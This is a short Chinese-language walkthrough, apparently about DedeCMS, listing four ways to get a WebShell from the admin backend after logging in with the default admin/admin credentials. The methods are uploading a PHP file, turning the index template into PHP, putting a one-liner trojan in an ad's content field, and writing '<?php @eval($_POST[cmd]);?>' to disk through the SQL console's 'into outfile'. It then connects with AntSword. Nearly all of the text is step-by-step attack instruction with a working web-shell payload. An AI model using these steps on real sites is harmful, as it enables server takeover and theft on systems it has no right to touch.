步骤一,登录网站
步骤二,进入后台
账号密码同为admin
姿势一,通过文件管理器上传WebShell
登陆到后台点击 【核心】--》【文件式管理器】【文件上传】 将准备好的一句话代码上传...OK
1.我们先创建一个1.php上传
2.上传之后我们双击1.php
3.我们进入1.php页面
4.蚁剑连接
姿势二,修改模板文件拿WebShell
与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下
1.我们修改一下index.htm,index.htm修改为php在第一段添加<?php phpinfo();?>点击保存
2.点击 【生成】【更新主页HTML】--》将主页位置修改为【/index.php】--》
点击 【生成静态】--》点击 【更新主页】 再次访问站点首页可发现变化...
3.访问/dede/../index.php
姿势三,后台任意命令执行拿WebShell
点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
1.添加内容在广告内容添加一句话木马其他的谁便写
2.点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
3.访问/plus/ad_js.php?aid=1
4.蚁剑连接
姿势四,通过sql命令行工具获取webshell
点击【系统】【sql命令行工具】--》多行命令中输入select '<?php @eval($_POST[cmd]);?>' into outfile '+路径+创建文件名
1.输入命令
2.点击确定
3.确认有记录
